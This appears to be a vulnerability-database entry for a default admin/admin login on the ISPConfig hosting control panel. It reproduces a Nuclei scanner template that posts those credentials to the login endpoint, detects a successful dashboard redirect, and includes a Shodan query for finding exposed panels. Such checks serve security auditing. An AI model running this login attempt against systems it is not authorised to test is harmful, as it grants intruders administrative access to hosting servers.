漏洞描述
ISPConfig Hosting Control Panel Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
ispconfig-hcp-default-login: ISPConfig Hosting Control Panel - Default Login
PoC代码[已公开]
id: ispconfig-hcp-default-login
info:
name: ISPConfig Hosting Control Panel - Default Login
author: ritikchaddha
severity: high
description: |
ISPConfig Hosting Control Panel Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
classification:
cpe: cpe:2.3:a:ispconfig:ispconfig:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ispconfig
product: ispconfig
shodan-query: title:"ISPConfig" http.favicon.hash:483383992
tags: ispconfig,hsp,default-login,vuln
http:
- raw:
- |
POST /content.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&passwort={{password}}&s_mod=login&s_pg=index
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'LOGIN_REDIRECT:dashboard/dashboard.php'
- type: word
part: header
words:
- 'Set-Cookie'
- type: status
status:
- 200
# digest: 490a0046304402204e3c3f0579869b4ddc90fdecc3f3476f99951bdc909c5b71664a213ea03bc3bf02204f4a4ca71568cf3984e88f7deae47ba7ca70bb6c256470235b338ecac4f32c9c:922c64590222798bb761d5b6d8e72950